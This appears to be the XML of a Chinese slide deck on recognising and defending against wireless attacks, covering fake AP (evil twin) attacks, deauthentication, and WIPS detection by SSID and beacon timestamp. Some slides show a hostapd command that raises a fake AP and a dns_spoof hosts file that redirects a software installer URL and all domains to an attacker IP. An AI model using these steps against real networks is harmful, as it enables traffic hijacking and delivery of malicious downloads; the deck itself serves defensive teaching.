                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Identify Fake AP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="图片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140" y="2262505"/>
            <a:ext cx="4771390" cy="374269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564505" y="3529965"/>
            <a:ext cx="579183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黑客先建立一个与你同SSID的热点，运用DOS Attack将合法Client强制断掉AP，当Client再次执行关联请求时，已经被劫持到Fake AP上，进行劫持，密码窃取等行为。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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="2033905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1" descr="图片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655" y="1461135"/>
            <a:ext cx="5127625" cy="284924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215505" y="1557655"/>
            <a:ext cx="3397885" cy="50774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1.发现其SSID与企业热点相同或类似的/无密码保护的，信道异常，应立刻进行阻断，名单规则应为‘非白即黑’。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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2.WIPS应设置每个热点的建立时间，并进行记录其运行时间，发现其热点时间不匹配的，应尽快阻断。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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（2）还有一种就是基于Timestamp的检测。当一个Fake AP建立的时候，它要创建一个Management Frames Beacon，每一个客户端都将包含一个Timestamp，这个时间戳应该是逐渐增长的，有一定规律的，是同步的，在802.11里面叫做TSF。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="微信截图_2018081222414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655" y="4450715"/>
            <a:ext cx="6139180" cy="23152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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="20339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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="20339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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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图片 28" descr="图片包含 星, 户外艺术系列&#10;&#10;已生成高可信度的说明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376484" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1664368" y="1697578"/>
            <a:ext cx="923223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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>BUSINESS TEMPLATE</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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1664368" y="4637202"/>
            <a:ext cx="92322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Lorem ipsum dolor sit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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amet</a:t>
            </a:r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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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consectetur</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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adipisicing</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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elit</a:t>
            </a:r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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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sed</a:t>
            </a:r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do </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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eiusmod</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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tempor</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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incididunt</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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ut</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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labore</a:t>
            </a:r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et dolore magna </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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aliqua</a:t>
            </a:r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. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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Ut</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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enim</a:t>
            </a:r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ad minim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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veniam</a:t>
            </a:r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, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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quis</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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nostrud</a:t>
            </a:r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exercitation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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ullamco</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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laboris</a:t>
            </a:r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nisi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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ut</a:t>
            </a:r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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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aliquip</a:t>
            </a:r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ex </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err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ea</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1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664368" y="3073234"/>
            <a:ext cx="923223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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>THANKS </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6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0">
        <p15:prstTrans prst="fallOver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9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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="20339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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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2" name="直接连接符 31" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1319686"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="1270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 descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="338824" y="1400648"/>
            <a:ext cx="7200000" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="3810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本框 37" descr="e7d195523061f1c0deeec63e560781cfd59afb0ea006f2a87ABB68BF51EA6619813959095094C18C62A12F549504892A4AAA8C1554C6663626E05CA27F281A14E6983772AFC3FB97135759321DEA3D70145073B7709DEAFA256CD57602346C569CD03E8246D33DA545568EA98FB062D63F616CDCDDC7C308D5561BD508072CED46FA16A315624C7F2FF57E77E923953F"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2148680" y="550835"/>
            <a:ext cx="56692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 algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>无线攻击的识别与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>防御策略</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="创艺简细圆" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="微信图片_201806281745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4935" y="-247015"/>
            <a:ext cx="2033905" cy="20339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Click="0" advTm="0">
        <p15:prstTrans prst="pageCurlDouble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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fake AP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1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35305" y="1603375"/>
            <a:ext cx="762571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➜  ~ sudo hostapd /etc/hostapd/hostapd-wpa.conf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Configuration file: /etc/hostapd/hostapd-test.conf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Using interface wlx00c0ca96ecf5 with hwaddr 00:c0:ca:96:ec:f5 and ssid "fakeap"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wlx00c0ca96ecf5: interface state UNINITIALIZED-&gt;ENABLED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wlx00c0ca96ecf5: AP-ENABLED</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3" descr="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55560" y="1603375"/>
            <a:ext cx="4215130" cy="2519680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="201703250950227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305" y="3434080"/>
            <a:ext cx="5604510" cy="2845435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="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9355" y="4178300"/>
            <a:ext cx="5811520" cy="210121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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arp&amp;Dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>劫持</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="tim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15" y="2692400"/>
            <a:ext cx="6158230" cy="417385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626225" y="1922780"/>
            <a:ext cx="5173980" cy="39693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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#                                                                          #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># Sample hosts file for dns_spoof plugin                                   #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#                                                                          #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># the format is (for A query):                                             #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#   www.myhostname.com A 168.11.22.33                                      #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>down.sandai.net/thunderx/XunLeiSetup10.0.2.60Beta.exe  A  10.101.177.66</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#   *.foo.com          A 168.44.55.66                                      #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*	A   10.101.177.66      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                   #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t># ... for a AAAA query (same hostname allowed):                            #</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
